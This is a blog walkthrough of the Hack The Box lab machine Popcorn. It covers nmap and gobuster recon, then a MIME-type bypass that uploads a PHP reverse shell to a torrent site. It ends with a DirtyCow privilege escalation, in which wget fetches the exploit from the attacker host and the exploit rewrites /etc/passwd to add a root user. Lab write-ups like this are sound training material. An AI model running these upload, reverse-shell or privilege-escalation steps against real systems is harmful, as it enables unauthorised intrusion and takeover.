Hack The Box Kernel Exploit

Hack The Box: Popcorn Walkthrough

Author
Dulanjana Fernando
Aug 21, 2026  •  7 min read  •  109 views
Hack The Box: Popcorn Walkthrough

Popcorn is a HackTheBox medium machine that emphasises the importance of enumeration. This machine involves exploiting the image upload MIME-type bypass in a torrent-hosting web application to gain an initial foothold. Privilege escalation involves exploiting a legacy Linux kernel exploit famously known as DirtyCow.

1. Initial Enumeration and Service Discovery

As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O popcorn.htb -oN nmap_scan to scan the open ports and services.

nmap -sC -sV -O popcorn.htb -oN nmap_scan
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-20 07:16 -0400
Nmap scan report for popcorn.htb (10.129.3.212)
Host is up (0.56s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=8/20%OT=22%CT=1%CU=42356%PV=Y%DS=2%DC=I%G=Y%TM=6A86E26
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=C5%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=8)SEQ(S
OS:P=C8%GCD=1%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP=C9%GCD=1%ISR=CD%TI=Z%CI=Z%I
OS:I=I%TS=8)SEQ(SP=CA%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=8)SEQ(SP=CF%GCD=1%ISR=
OS:CE%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M542ST11NW6%O2=M542ST11NW6%O3=M542NNT11NW6
OS:%O4=M542ST11NW6%O5=M542ST11NW6%O6=M542ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W
OS:4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M542NNSNW6%CC=Y%Q=)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds

Based on the scan results, the target machine has only two ports open: Port 22 and Port 80.

By visiting port 80 using a web browser, I discovered that the website only had the default page and no version numbers or any other information visible.

Article Image
web server default page

1.1 Web Directory Enumeration (Port 80)

Since there is no usable information on the default page, I decided to run a GoBuster directory scan to see if there are any hidden directories.

gobuster dir -u popcorn.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,md,txt,html -t 20
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://popcorn.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              html,php,md,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index                (Status: 200) [Size: 177]
index.html           (Status: 200) [Size: 177]
test                 (Status: 200) [Size: 47371]
test.php             (Status: 200) [Size: 47399]
torrent              (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/]
rename               (Status: 301) [Size: 311] [--> http://popcorn.htb/rename/]

Based on the scan results, I discovered that the /test endpoint has the complete phpinfo() diagnostic output. It discloses that the target is running PHP Version 5.2.10 on an outdated Linux kernel (2.6.31-14-generic-pae).

Article Image
phpinfo() page

/rename endpoint exposes documentation for the Renamer API.
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

/torrent endpoint hosts a web application named "Torrent Hoster".

2. Initial Access - Torrent Hoster Upload Bypass

Torrent Hoster web application includes user login and registration functionalities. I decided to register as a new user and log in to the application.
After logging in, I immediately downloaded a PHP reverse shell script from pentestmonkey and tried to upload it using the torrent upload form.

But this form did not allow me to upload any PHP files, image files, or text files with the .torrent extension.
Since this did not work, I wanted to check if the form works for a legitimate torrent file. So I downloaded a torrent file from Ubuntu Releases Page and uploaded it, and the form successfully uploaded the file and redirected me to the file details page.

Article Image
Torrent upload form

2.1 MIME-Type Bypass via Screenshot Upload

Submitting a legitimate .torrent file succeeds, redirecting to the file details page where users can manage torrent information and upload screenshot images.
I tried uploading the PHP reverse shell using the screenshot uploader section, but it also failed because the form was validating the image files and only allowing image files.
So, I decided to use Burp Suite to intercept the request and change the MIME type of the file from application/x-php to image/png.

Article Image
Intercepting form submission using BurpSuit

This worked, and the PHP reverse shell script was uploaded successfully.

Article Image
Image upload success

2.2 Initial Foothold

The uploaded screenshot is now visible in the torrent edit page with the text "Image File Not Found!". Next, I set up a Netcat listener and clicked on the text to trigger the reverse shell script.

And, I was able to get a reverse shell connection as www-data.

nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.36] from (UNKNOWN) [10.129.3.212] 51975
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 15:40:30 up  1:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data

3. Local Enumeration & User Flag

After establishing the initial access as www-data, I decided to enumerate the target machine for users and to find the user flag.
The machine had only one user, george, and surprisingly, www-data was able to access george's home directory and read the user flag.

# Usar flag
www-data@popcorn:/$ cd home
www-data@popcorn:/home$ ls
george
www-data@popcorn:/home$ cd george/
www-data@popcorn:/home/george$ ls
torrenthoster.zip  user.txt
www-data@popcorn:/home/george$ cat user.txt

4. Privilege Escalation & Root Flag

I downloaded LinPeas to the target machine to enumerate and find a way to escalate privileges. (wget http://10.10.16.36:8000/linpeas.sh)

LinPeas flagged a list of highly vulnerable kernel exploits.

Article Image
LinPeas Results

I tried some of the exploits listed, and some resulted in complete machine freezes, so I had to reset the machine two times and do everything all over again.

Eventually I tried DirtyCow kernel exploit to escalate privileges as root.
Once I downloaded the exploit to the target machine, I compiled the exploit using gcc -pthread 40839.c -o 40839 -lcrypt on the target machine itself because my local compiler was throwing errors at the old exploit code.

# Downloading and compiling the exploit
www-data@popcorn:/tmp$ wget http://10.10.16.36:8000/40839.c
--2026-08-20 16:53:37--  http://10.10.16.36:8000/40839.c
Connecting to 10.10.16.36:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/x-csrc]
Saving to: `40839.c'

100%[======================================>] 5,006       --.-K/s   in 0.006s  

2026-08-20 16:53:39 (790 KB/s) - `40839.c' saved [5006/5006]

www-data@popcorn:/tmp$ gcc -pthread 40839.c -o 40839 -lcrypt

This exploit overwrites the root account with a generated line, and after running the exploit, I will be able to log in as the new user firefart with root privileges.

# Running exploit to escalate privileges
www-data@popcorn:/tmp$ ./40839 
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash

mmap: b7790000

^C
www-data@popcorn:/tmp$ su firefart
Password: 
firefart@popcorn:/tmp# whoami
firefart
firefart@popcorn:/tmp# sudo -l
sudo: unknown user: root
firefart@popcorn:/tmp# cd /root
firefart@popcorn:~# ls
root.txt
firefart@popcorn:~# cat root.txt

Congrats! We found both flags!

HTB Machine Completion

Tags:
Kernel Exploit BurpSuit DirtyCow Torrent Hoster

You might also like...

Hack The Box: TwoMillion Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: TwoMillion Walkthrough

TwoMillion is an easy-difficulty HackTheBox machine that begins with reverse eng...

Read More
Hack The Box: Cicada Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: Cicada Walkthrough

Cicada is an easy-difficulty HackTheBox machine that hosts a Windows Active Dire...

Read More
Hack The Box: Layover Walkthrough
Hack The Box Special Season: Aero
Hack The Box: Layover Walkthrough

Layover is a Medium difficulty HackTheBox machine that is part of Season 12....

Read More

Stay Updated

Get notified when new walkthroughs and security articles are published.